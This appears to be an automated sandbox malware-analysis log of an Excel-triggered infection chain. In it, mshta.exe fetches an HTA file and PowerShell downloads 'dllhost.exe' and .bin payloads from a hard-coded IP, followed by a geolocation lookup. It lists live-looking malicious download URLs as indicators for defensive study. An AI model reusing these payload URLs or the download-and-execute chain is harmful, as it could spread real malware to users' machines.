          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.22
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_000007FE896F7018 URLDownloadToFileW,7_2_000007FE896F7018
          Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\82C6F378.emfJump to behavior
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /2Rxzb3 HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: og1.inConnection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Range: bytes=8896-Connection: Keep-AliveHost: 192.3.220.22If-Range: "1ceb2-62345be2e2e61"
          Source: global trafficHTTP traffic detected: GET /430/dllhost.exe HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 192.3.220.22Connection: Keep-Alive
          Source: global trafficHTTP traffic detected: GET /xampp/en/cookienetbookinetcahce.hta HTTP/1.1Accept: */*Accept-Language: en-USUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)If-Modified-Since: Sun, 29 Sep 2024 17:51:50 GMTConnection: Keep-AliveHost: 192.3.220.22If-None-Match: "1ceb2-62345be2e2e61"
          Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /json.gp HTTP/1.1Host: geoplugin.netCache-Control: no-cache
          Source: global trafficHTTP traffic detected: GET /hFXELFSwRHRwqbE214.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: 192.3.220.22Cache-Control: no-cache
          Source: Vaccinerende.exeString found in binary or memory: http://www.ebuddy.com equals www.ebuddy.com (eBuggy)
          Source: Vaccinerende.exeString found in binary or memory: http://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
          Source: global trafficDNS traffic detected: DNS query: og1.in
          Source: global trafficDNS traffic detected: DNS query: geoplugin.net
          Source: mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/
          Source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.
          Source: powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.535608601.000000001C286000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.exe
          Source: powershell.exe, 00000007.00000002.447277326.000000001A99F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.exe%m
          Source: powershell.exe, 00000007.00000002.434786957.0000000002FFF000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002952000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/430/dllhost.exep
          Source: mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/ic
          Source: mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/videro
          Source: mshta.exe, 00000004.00000002.414718403.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.414694836.0000000000465000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003320000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.414241682.00000000004DE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.460570080.00000000003CE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471733215.0000000003D9C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471568642.00000000003CC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003E11000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472196529.0000000003D9C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta
          Source: mshta.exe, 00000004.00000002.417244267.0000000003320000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.hta9p
          Source: mshta.exe, 0000000F.00000002.471964740.000000000035A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.459453313.0000000003E3C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaC:
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaF
          Source: mshta.exe, 0000000F.00000003.471733215.0000000003DBC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472196529.0000000003DBC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaMy
          Source: mshta.exe, 00000004.00000002.417244267.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.00000000033BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413946521.00000000033BC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaP
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htaQ
          Source: mshta.exe, 00000004.00000003.414430980.0000000002A05000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.468769729.0000000002D35000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470941601.0000000002D35000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.22/xampp/en/cookienetbookinetcahce.htahttp://192.3.220.22/xampp/en/cookienetbookine
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.447277326.000000001AA4E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
          Source: Vaccinerende.exe, 0000001C.00000003.782206298.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000001C.00000003.782247647.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000001C.00000003.782223915.00000000003AC000.00000004.00000020.00020000.00000000.sdmp, Vaccinerende.exe, 0000001C.00000003.782756123.00000000003AC000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
          Source: powershell.exe, 00000007.00000002.449310498.000000001C553000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.cr
          Source: powershell.exe, 00000007.00000002.434786957.0000000002703000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002BAA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
          Source: powershell.exe, 0000000C.00000002.775886453.00000000001E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microso
          Source: dllhost.exe, 0000000B.00000002.442142860.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, dllhost.exe, 0000000B.00000000.434267277.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000000.475272548.000000000040A000.00000008.00000001.01000000.0000000B.sdmp, dllhost.exe, 00000017.00000002.487716282.000000000040A000.00000004.00000001.01000000.0000000B.sdmp, Vaccinerende.exe, 0000001C.00000000.717210149.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000032.00000000.848787403.000000000040A000.00000008.00000001.01000000.0000000D.sdmp, Vaccinerende.exe, 00000039.00000000.901018571.000000000040A000.00000008.00000001.01000000.0000000D.sdmpString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
          Source: powershell.exe, 00000007.00000002.445540287.0000000012531000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.793905952.0000000003479000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C421000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DDE000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DDE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
          Source: powershell.exe, 00000007.00000002.434786957.0000000002501000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.781549529.0000000002451000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.479817740.0000000002421000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000018.00000002.937693979.0000000002451000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
          Source: mshta.exe, 00000004.00000003.413946521.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.417244267.0000000003375000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413839086.0000000003374000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.413828049.0000000003370000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.449310498.000000001C49E000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.471034677.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000003.470666205.0000000003DC6000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000F.00000002.472217661.0000000003DC6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
